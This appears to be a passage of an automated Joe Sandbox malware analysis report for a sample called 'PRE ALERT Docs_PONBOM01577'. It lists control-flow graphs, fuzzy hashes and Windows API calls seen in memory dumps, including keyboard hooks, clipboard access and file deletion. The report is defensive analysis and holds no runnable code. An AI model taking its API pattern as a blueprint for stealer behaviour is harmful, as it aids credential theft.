                        control_flow_graph 301 6a18cc8-6a18ced 302 6a18cef-6a18cf2 301->302 303 6a195b0-6a195b3 302->303 304 6a18cf8-6a18d0d 302->304 305 6a195b5-6a195d4 303->305 306 6a195d9-6a195db 303->306 310 6a18d25-6a18d3b 304->310 311 6a18d0f-6a18d15 304->311 305->306 308 6a195e2-6a195e5 306->308 309 6a195dd 306->309 308->302 313 6a195eb-6a195f5 308->313 309->308 318 6a18d46-6a18d48 310->318 314 6a18d17 311->314 315 6a18d19-6a18d1b 311->315 314->310 315->310 319 6a18d60-6a18dd1 318->319 320 6a18d4a-6a18d50 318->320 331 6a18dd3-6a18df6 319->331 332 6a18dfd-6a18e19 319->332 321 6a18d52 320->321 322 6a18d54-6a18d56 320->322 321->319 322->319 331->332 337 6a18e45-6a18e60 332->337 338 6a18e1b-6a18e3e 332->338 343 6a18e62-6a18e84 337->343 344 6a18e8b-6a18ea6 337->344 338->337 343->344 349 6a18ea8-6a18ec4 344->349 350 6a18ecb-6a18ed9 344->350 349->350 351 6a18ee9-6a18f63 350->351 352 6a18edb-6a18ee4 350->352 358 6a18fb0-6a18fc5 351->358 359 6a18f65-6a18f83 351->359 352->313 358->303 363 6a18f85-6a18f94 359->363 364 6a18f9f-6a18fae 359->364 363->364 364->358 364->359
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 3fe3a8d2538e7a7b72b6d6c79d75c3e68efd7955118472e3c4e3024850c83836
                        • Instruction ID: 0cca582a4c4170d9eab26197f879cc428b7d8298d63eb72f947dece6d08610aa
                        • Opcode Fuzzy Hash: 3fe3a8d2538e7a7b72b6d6c79d75c3e68efd7955118472e3c4e3024850c83836
                        • Instruction Fuzzy Hash: 2F914F30B1021A9FDB54EF65D9507AEB3F6AFC9204F10856AD41AEB384EB30DD468B91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 367 6a1cec8-6a1cee3 368 6a1cee5-6a1cee8 367->368 369 6a1cef2-6a1cef5 368->369 370 6a1ceea-6a1ceef 368->370 371 6a1cef7-6a1cf39 369->371 372 6a1cf3e-6a1cf41 369->372 370->369 371->372 373 6a1cf43-6a1cf85 372->373 374 6a1cf8a-6a1cf8d 372->374 373->374 376 6a1cfd6-6a1cfd9 374->376 377 6a1cf8f-6a1cfd1 374->377 379 6a1cfe8-6a1cfeb 376->379 380 6a1cfdb-6a1cfdd 376->380 377->376 384 6a1d034-6a1d037 379->384 385 6a1cfed-6a1d02f 379->385 382 6a1cfe3 380->382 383 6a1d26f-6a1d278 380->383 382->379 390 6a1d287-6a1d293 383->390 391 6a1d27a-6a1d27f 383->391 388 6a1d080-6a1d083 384->388 389 6a1d039-6a1d07b 384->389 385->384 393 6a1d085-6a1d0c7 388->393 394 6a1d0cc-6a1d0cf 388->394 389->388 396 6a1d3a4-6a1d3a9 390->396 397 6a1d299-6a1d2ad 390->397 391->390 393->394 399 6a1d0d1-6a1d113 394->399 400 6a1d118-6a1d11b 394->400 411 6a1d3b1 396->411 397->411 412 6a1d2b3-6a1d2c5 397->412 399->400 408 6a1d121-6a1d124 400->408 409 6a1d3b4-6a1d3c0 400->409 418 6a1d147-6a1d14a 408->418 419 6a1d126-6a1d142 408->419 414 6a1d3c6-6a1d6b3 409->414 415 6a1d14c-6a1d15b 409->415 411->409 442 6a1d2c7-6a1d2cd 412->442 443 6a1d2e9-6a1d2eb 412->443 579 6a1d6b9-6a1d6bf 414->579 580 6a1d8da-6a1d8e4 414->580 421 6a1d16a-6a1d176 415->421 422 6a1d15d-6a1d162 415->422 418->415 420 6a1d193-6a1d196 418->420 419->418 429 6a1d1a5-6a1d1a8 420->429 430 6a1d198-6a1d19a 420->430 427 6a1d8e5-6a1d91e 421->427 428 6a1d17c-6a1d18e 421->428 422->421 460 6a1d920-6a1d923 427->460 428->420 440 6a1d1f1-6a1d1f4 429->440 441 6a1d1aa-6a1d1ec 429->441 430->411 439 6a1d1a0 430->439 439->429 454 6a1d211-6a1d214 440->454 455 6a1d1f6-6a1d20c 440->455 441->440 449 6a1d2d1-6a1d2dd 442->449 450 6a1d2cf 442->450 452 6a1d2f5-6a1d301 443->452 461 6a1d2df-6a1d2e7 449->461 450->461 481 6a1d303-6a1d30d 452->481 482 6a1d30f 452->482 456 6a1d216-6a1d225 454->456 457 6a1d25d-6a1d25f 454->457 455->454 463 6a1d234-6a1d240 456->463 464 6a1d227-6a1d22c 456->464 466 6a1d261 457->466 467 6a1d266-6a1d269 457->467 469 6a1d925-6a1d941 460->469 470 6a1d946-6a1d949 460->470 461->452 463->427 475 6a1d246-6a1d258 463->475 464->463 466->467 467->368 467->383 469->470 479 6a1d94b-6a1d977 470->479 480 6a1d97c-6a1d97f 470->480 475->457 479->480 487 6a1d981 call 6a1da3d 480->487 488 6a1d98e-6a1d990 480->488 485 6a1d314-6a1d316 481->485 482->485 485->411 494 6a1d31c-6a1d338 call 6a16110 485->494 495 6a1d987-6a1d989 487->495 490 6a1d992 488->490 491 6a1d997-6a1d99a 488->491 490->491 491->460 496 6a1d99c-6a1d9ab 491->496 508 6a1d347-6a1d353 494->508 509 6a1d33a-6a1d33f 494->509 495->488 505 6a1da12-6a1da27 496->505 506 6a1d9ad-6a1da10 call 6a16110 496->506 506->505 508->396 512 6a1d355-6a1d3a2 508->512 509->508 512->411 581 6a1d6c1-6a1d6c6 579->581 582 6a1d6ce-6a1d6d7 579->582 581->582 582->427 583 6a1d6dd-6a1d6f0 582->583 585 6a1d6f6-6a1d6fc 583->585 586 6a1d8ca-6a1d8d4 583->586 587 6a1d70b-6a1d714 585->587 588 6a1d6fe-6a1d703 585->588 586->579 586->580 587->427 589 6a1d71a-6a1d73b 587->589 588->587 592 6a1d74a-6a1d753 589->592 593 6a1d73d-6a1d742 589->593 592->427 594 6a1d759-6a1d776 592->594 593->592 594->586 597 6a1d77c-6a1d782 594->597 597->427 598 6a1d788-6a1d7a1 597->598 600 6a1d7a7-6a1d7ce 598->600 601 6a1d8bd-6a1d8c4 598->601 600->427 604 6a1d7d4-6a1d7de 600->604 601->586 601->597 604->427 605 6a1d7e4-6a1d7fb 604->605 607 6a1d80a-6a1d825 605->607 608 6a1d7fd-6a1d808 605->608 607->601 613 6a1d82b-6a1d844 call 6a16110 607->613 608->607 617 6a1d853-6a1d85c 613->617 618 6a1d846-6a1d84b 613->618 617->427 619 6a1d862-6a1d8b6 617->619 618->617 619->601
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q
                        • API String ID: 0-831282457
                        • Opcode ID: 6cd121a24cf1517d1bb33ec4c46010ec83dc883b21e3b46419e84e6e77aedd21
                        • Instruction ID: 1f77441229c0eb791765208b987c2a8105ba6875cd1f80c6e8c62c3a20e49930
                        • Opcode Fuzzy Hash: 6cd121a24cf1517d1bb33ec4c46010ec83dc883b21e3b46419e84e6e77aedd21
                        • Instruction Fuzzy Hash: 3E622E31A40206DFCB55EB68D590A5EB7F2FF84304F248A69D0099F759EB71ED4ACB80

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 627 6a14718-6a1473c 628 6a1473e-6a14741 627->628 629 6a14e20-6a14e23 628->629 630 6a14747-6a1483f 628->630 631 6a14e25-6a14e3f 629->631 632 6a14e44-6a14e46 629->632 650 6a148c2-6a148c9 630->650 651 6a14845-6a14892 call 6a14fc0 630->651 631->632 633 6a14e48 632->633 634 6a14e4d-6a14e50 632->634 633->634 634->628 636 6a14e56-6a14e63 634->636 652 6a1494d-6a14956 650->652 653 6a148cf-6a1493f 650->653 664 6a14898-6a148b4 651->664 652->636 670 6a14941 653->670 671 6a1494a 653->671 668 6a148b6 664->668 669 6a148bf-6a148c0 664->669 668->669 669->650 670->671 671->652
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: fcq$XPcq$\Ocq
                        • API String ID: 0-3575482020
                        • Opcode ID: dc536dc9be6a2b2d93066ebcb698af71dfd3a962df19fb02daac7da6a6da64cf
                        • Instruction ID: 8886e54d762279a5261be88edb17e2997a7470ef1b7a491b17ed0c8825b14ebc
                        • Opcode Fuzzy Hash: dc536dc9be6a2b2d93066ebcb698af71dfd3a962df19fb02daac7da6a6da64cf
                        • Instruction Fuzzy Hash: 17617030F002199FEB55AFA9C8547AEBBF6FF88700F208429D10AAF395DB754C458B91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1539 6a18cb7-6a18ced 1542 6a18cef-6a18cf2 1539->1542 1543 6a195b0-6a195b3 1542->1543 1544 6a18cf8-6a18d0d 1542->1544 1545 6a195b5-6a195d4 1543->1545 1546 6a195d9-6a195db 1543->1546 1550 6a18d25-6a18d3b 1544->1550 1551 6a18d0f-6a18d15 1544->1551 1545->1546 1548 6a195e2-6a195e5 1546->1548 1549 6a195dd 1546->1549 1548->1542 1553 6a195eb-6a195f5 1548->1553 1549->1548 1558 6a18d46-6a18d48 1550->1558 1554 6a18d17 1551->1554 1555 6a18d19-6a18d1b 1551->1555 1554->1550 1555->1550 1559 6a18d60-6a18dd1 1558->1559 1560 6a18d4a-6a18d50 1558->1560 1571 6a18dd3-6a18df6 1559->1571 1572 6a18dfd-6a18e19 1559->1572 1561 6a18d52 1560->1561 1562 6a18d54-6a18d56 1560->1562 1561->1559 1562->1559 1571->1572 1577 6a18e45-6a18e60 1572->1577 1578 6a18e1b-6a18e3e 1572->1578 1583 6a18e62-6a18e84 1577->1583 1584 6a18e8b-6a18ea6 1577->1584 1578->1577 1583->1584 1589 6a18ea8-6a18ec4 1584->1589 1590 6a18ecb-6a18ed9 1584->1590 1589->1590 1591 6a18ee9-6a18f63 1590->1591 1592 6a18edb-6a18ee4 1590->1592 1598 6a18fb0-6a18fc5 1591->1598 1599 6a18f65-6a18f83 1591->1599 1592->1553 1598->1543 1603 6a18f85-6a18f94 1599->1603 1604 6a18f9f-6a18fae 1599->1604 1603->1604 1604->1598 1604->1599
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: feb08fd3a833e1b4274b00276e97f52d29121013ab8f13372fda9cf933fb4492
                        • Instruction ID: b41376ea0f3ad635ef7895e7f1caa29e9aa5d9079cc6bb430f0d6d384dffe0b2
                        • Opcode Fuzzy Hash: feb08fd3a833e1b4274b00276e97f52d29121013ab8f13372fda9cf933fb4492
                        • Instruction Fuzzy Hash: 90515430B102169FDB54EF75D950B6F73F6ABC8644F10856AC41ADB384EB34DC428B95
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C33AA
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 9120e1d9ab0f25cb26df70a6f6911ed30d02cd8fdcf2be29b910ec8d19b217c3
                        • Instruction ID: 27a8912f1ef3e331cb40a485ce05ed759267a6322ed6f6a0fbd155729c30e223
                        • Opcode Fuzzy Hash: 9120e1d9ab0f25cb26df70a6f6911ed30d02cd8fdcf2be29b910ec8d19b217c3
                        • Instruction Fuzzy Hash: 6151B1B1D00309EFDB14CFA9C884ADEBBB5BF48710F64812AE419AB210D7759985CF95
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C33AA
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 10c5be766c8d10ae6a03f7699d0bc5f34d9123699c29fda57d0aec716a9afa22
                        • Instruction ID: c7774c6cfca3707c641f5075364f9fd54aae9fa76536d9c07e85455dddb09bdf
                        • Opcode Fuzzy Hash: 10c5be766c8d10ae6a03f7699d0bc5f34d9123699c29fda57d0aec716a9afa22
                        • Instruction Fuzzy Hash: 3541B0B1D00309DFDB14CFAAC984ADEFBB5BF48310F64812AE419AB210D7759945CF91
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 069C7CC9
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: a32c8c4492d06468c92e2b8a5fae1888ca8e52fa8721dec90273c0af4f708d02
                        • Instruction ID: 1fcefe2b5441e6b067e93725fa9945ba248e9da2cacca62e13fcb52906790d80
                        • Opcode Fuzzy Hash: a32c8c4492d06468c92e2b8a5fae1888ca8e52fa8721dec90273c0af4f708d02
                        • Instruction Fuzzy Hash: 1B4129B4900309CFCB54CF99C488AAABBF5FB88324F24C859D519AB761D734A941CFA1
                        APIs
                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02C086C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: FileMove
                        • String ID:
                        • API String ID: 3562171763-0
                        • Opcode ID: b62875715b0f42e821afa4c7cf8d75237da31365bd316a65cb0d30e529f5a6ed
                        • Instruction ID: 8d4fbfc0bd4cf7c30cae81ae76a49e4940c57f0023bb14003aa81708c35205c1
                        • Opcode Fuzzy Hash: b62875715b0f42e821afa4c7cf8d75237da31365bd316a65cb0d30e529f5a6ed
                        • Instruction Fuzzy Hash: 20319FB1C053589FCB01CFA9D884ADEBFF4FF89320F15819AD858AB291C7345944CBA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: 03e2ddd8feff2e7ac5b227f6a1848317a2996ab922f283fdab6f8a0c4dfe7a4d
                        • Instruction ID: 9d3f1305533a67f6a98da8befb6a8823aae410f64e0dc19b58f68aa5f8f62a1c
                        • Opcode Fuzzy Hash: 03e2ddd8feff2e7ac5b227f6a1848317a2996ab922f283fdab6f8a0c4dfe7a4d
                        • Instruction Fuzzy Hash: D73102B0D01249DFDB54CFA8C984BDEBFF5AB48314F248059E408BB294DB746945CF55
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: f2e88260d1e8ac6d4154c21eab9725a472abdb85bf01a0ce6984cba18ebbd69e
                        • Instruction ID: d9b6dd48ff1a072bb41a6ffbad16ef8fad3ab80e13a20de0d4e5b52223b072de
                        • Opcode Fuzzy Hash: f2e88260d1e8ac6d4154c21eab9725a472abdb85bf01a0ce6984cba18ebbd69e
                        • Instruction Fuzzy Hash: F331E0B0D01208DFDB14CF99C984BCEBBF5AB48324F248059E404AB294DB74A945CFA6
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069C6DF7
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 782fec0c6cd73f0d269e5cb3187d9a86dcb120f89b1de6901b5fccbbbe85e68a
                        • Instruction ID: 2d0229632fea8f8261c1f2a7ee4773da4bd70c761445a56d72d4eaf9d64903b4
                        • Opcode Fuzzy Hash: 782fec0c6cd73f0d269e5cb3187d9a86dcb120f89b1de6901b5fccbbbe85e68a
                        • Instruction Fuzzy Hash: 5B2105B5900248EFDB10CFAAD984ADEFFF8EB48320F14841AE954A3310C374A940DFA5
                        APIs
                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02C086C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: FileMove
                        • String ID:
                        • API String ID: 3562171763-0
                        • Opcode ID: b01fd50881e3add27381ab5d410c6900d5dd0ac1d3bbca21bc72c731258bc429
                        • Instruction ID: 4c1539171108c72743de36eeaaff9f1447dc0e658f05ab8c642dd025e4faae6d
                        • Opcode Fuzzy Hash: b01fd50881e3add27381ab5d410c6900d5dd0ac1d3bbca21bc72c731258bc429
                        • Instruction Fuzzy Hash: 702125B6C01218DFCB10CF99D884ADEFBF5FB88310F15815AE818AB244C7759A40CBA4
                        APIs
                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02C086C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: FileMove
                        • String ID:
                        • API String ID: 3562171763-0
                        • Opcode ID: 9da11b67062fd19a0e05e7058d36c380b732d44f1c1db64e46fa6a67b225104d
                        • Instruction ID: 32a54a1a43f817882af6879902293b6af842bc8269a1f1b8ac2137be821c9e83
                        • Opcode Fuzzy Hash: 9da11b67062fd19a0e05e7058d36c380b732d44f1c1db64e46fa6a67b225104d
                        • Instruction Fuzzy Hash: 882125B6C01208DFCB10CF99D484ADEFFB1BB88310F25815AE818AB354C3359A41CFA4
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CA78B
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: de2de0b60ddb94250c433905e136c5422840033b47f6b7d6a9c6055d8d51b8b5
                        • Instruction ID: 703544495c8abbaead64fa9763383911f37ef9508b32120764983406743b61ad
                        • Opcode Fuzzy Hash: de2de0b60ddb94250c433905e136c5422840033b47f6b7d6a9c6055d8d51b8b5
                        • Instruction Fuzzy Hash: 682115B5D002099FCB54CFAAC944BDEFBF9FB88320F108429E459A7250C774A944CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069C6DF7
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 4c2ec623ad7e8a15f3a028c205dbdb4411dd080dc32f8d103d6a330153616610
                        • Instruction ID: 21b1b554b9fbe176d6b67d630e8bb2fe1f3aa098dece352bab9593cadb556eb4
                        • Opcode Fuzzy Hash: 4c2ec623ad7e8a15f3a028c205dbdb4411dd080dc32f8d103d6a330153616610
                        • Instruction Fuzzy Hash: AC21B0B59002589FDB10CFAAD984ADEFBF8EB48320F14841AE958A7250D374A954CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,069C8315), ref: 069C839F
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: b54dd16285304c9a8a29e712dfa5b5ac9eb35e23f1a4fd2879dca77f36459a34
                        • Instruction ID: a3e86823adf166a3ecfc5c6672aca0dbf9ad3a1e01781ae77836abab17274690
                        • Opcode Fuzzy Hash: b54dd16285304c9a8a29e712dfa5b5ac9eb35e23f1a4fd2879dca77f36459a34
                        • Instruction Fuzzy Hash: 51218EB18093988FCB11DFADC954BDEBFF4EF4A320F15409AD494A7251C374A944CBA9
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 069C2256
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 449e0a6b1370ed03cb67bcf5f522d3d1d00cb6a110e023b8c7bea6584192d516
                        • Instruction ID: de687ec3f68444a00ebc29275730d02934281ec50119c66c2e5f4569f14079e3
                        • Opcode Fuzzy Hash: 449e0a6b1370ed03cb67bcf5f522d3d1d00cb6a110e023b8c7bea6584192d516
                        • Instruction Fuzzy Hash: B8213AB1C053888FCB15CFAAC844ACEBFF4EF49220F14859AD458A7651C3746545CFA6
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CA78B
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 9acdbb55a2108983026a445e4771e57aafa5c67392994d4368860dd89fcf7a9b
                        • Instruction ID: 598049fc6821c26c3a3bfcb24a61393dcede60f38c89b63777dfb72cec5f9aa3
                        • Opcode Fuzzy Hash: 9acdbb55a2108983026a445e4771e57aafa5c67392994d4368860dd89fcf7a9b
                        • Instruction Fuzzy Hash: DB21E5B5D002099FCB54DF99C944BDEFBF5BB88324F108429D459A7250C774A944CFA5
                        APIs
                        • DeleteFileW.KERNELBASE(00000000), ref: 02C080D0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: ce09f0e67b84105fd561bf33a4dd328a38ed1a6648aa3a541df2a24d139a2b9d
                        • Instruction ID: 8b75ed54d23b1b4fac952a9e56152facc532a3e2a25d490460c9dac7f6b668d7
                        • Opcode Fuzzy Hash: ce09f0e67b84105fd561bf33a4dd328a38ed1a6648aa3a541df2a24d139a2b9d
                        • Instruction Fuzzy Hash: D52138B1C00659CFCB14CF99D544BEEFBB4BB48324F118269D458B7250D374AA40CFA5
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE ref: 02C0F47F
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 1638cb2cd121b0cfedf01c384d72123f58972ec68cd7e09dc529c74fd1cf454b
                        • Instruction ID: 38a829122408eb2a71092598e9ed4054b263ce34a71387edb09524603ff01a90
                        • Opcode Fuzzy Hash: 1638cb2cd121b0cfedf01c384d72123f58972ec68cd7e09dc529c74fd1cf454b
                        • Instruction Fuzzy Hash: 291114B1C006599BCB10DF9AC544BDEFBF8BB48324F15816AE818B7250D778A944CFE5
                        APIs
                        • DeleteFileW.KERNELBASE(00000000), ref: 02C080D0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: b1ff3b64d2fffd42638488e32605f70c7ec4cc690f202c26b1ebe3b126e22f85
                        • Instruction ID: 3217aac7487aec0d24cdab981979a06c508c594bd41fdbd3e3a53e7bb94ad53e
                        • Opcode Fuzzy Hash: b1ff3b64d2fffd42638488e32605f70c7ec4cc690f202c26b1ebe3b126e22f85
                        • Instruction Fuzzy Hash: C11133B1C0061A9BCB10CF9AC544BDEFBB4BB48324F11826AD858B7250D378AA40CFE5
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE ref: 02C0F47F
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098752200.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_2c00000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: edb105c2b3c9c3d411aed313a6c3679463897547e7c345be96c393a71148a66d
                        • Instruction ID: 3fa1efcddf0821d31bb29591939b776400f603fb6acb1c799524319f1d7b1278
                        • Opcode Fuzzy Hash: edb105c2b3c9c3d411aed313a6c3679463897547e7c345be96c393a71148a66d
                        • Instruction Fuzzy Hash: 9E1123B1C002699BCB10CF9AC544BDEFBF4BF48320F15816AD818B7250D778A940CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 069C2256
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 465a0d95b8b95dc8909385c720a4c0e1f3b0be1430ac661ddb3cef7029bb0f69
                        • Instruction ID: 45811c8b7c743218a5302e5ef5f24d003a354f4c2059335e016c425db858108e
                        • Opcode Fuzzy Hash: 465a0d95b8b95dc8909385c720a4c0e1f3b0be1430ac661ddb3cef7029bb0f69
                        • Instruction Fuzzy Hash: 311104B5C003498FCB14DF9AC444ADEFBF8EB49224F10846AD419B7610C375A645CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,069C8315), ref: 069C839F
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
